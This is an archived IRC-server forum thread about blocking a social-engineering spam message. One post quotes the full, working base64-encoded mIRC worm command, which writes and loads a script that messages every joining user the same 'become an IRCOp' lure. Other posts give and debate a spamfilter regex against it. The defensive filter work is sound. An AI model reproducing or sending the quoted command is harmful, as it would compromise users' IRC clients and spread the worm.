new one.. similar to matrix2 and nospam ones

These are old archives. They are kept for historic purposes only.
nexus

new one.. similar to matrix2 and nospam ones

Post by nexus »

this is sent only via onjoin pm (as you can see if you check it out in mirc with an echo statement ;)):

Code: Select all

<WenW> Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs $decode(bmV3Yg==,m)
heres my filter, works well so far:

Code: Select all

spamfilter {
     regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";
     target private;
     action block;
     reason "Spamming users with an mIRC trojan. Type '/unload -rs newb' to remove the trojan.";
};
Syzop
UnrealIRCd head coder

Post by Syzop »

Ok, added in CVS.

Could you explain why you did (see underlined chars):
regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";

I removed that, since it seemed useless.
nexus

Post by nexus »

I did that becuase there are 2 instances of $decode before the first pipe ;)

{1} means the preceding text will be repeated one time.. it does not start counting until after the first instance.. so since $decode gets used twice before the pipe, that (){1} works good ;)

but, I do think the entry you have added in cvs is better, because it will catch more variants that may pop up with $decode (and they will too)
aquanight
Official supporter

Post by aquanight »

heh, personally, I would just block $decode and $encode altogether...

... for the main reason that you can't exactly verify the contents of any message using $decode or $encode without unencoding it. If it has | characters, you might wind up setting it off :) (unless you use /echo with only one slash).

If people need to send stuff like that, they really should use DCC. It's much easier to verify them, because I could then pop the file in notepad and have a look at what I was sent. AFAIK, opening any file in Notepad/Wordpad/vi[m]/emacs/nano, or heck, cat is pretty much harmless. Or if I really don't trust the file, I would simply hit Ignore on the DCC Get dialog :) .

*edit* Can someone enable right margins for the forum? Because these long regexes play havoc on the layout :P And my 800X600 screen can't handle it :( */edit*
codemastr
Former UnrealIRCd head coder

Post by codemastr »

heh, personally, I would just block $decode and $encode altogether...
* User joins #mirc
<User> Can anyone help me with $encode? I'm trying to use it to encode an email attachment.

And that's why it's a bad idea to do that. $encode and $decode are not inherently bad. First off, I don't use mIRC, so why should I be banned from saying it? It doesn't affect me at all. Second, what if I have a completely valid reason for saying it?
-- codemastr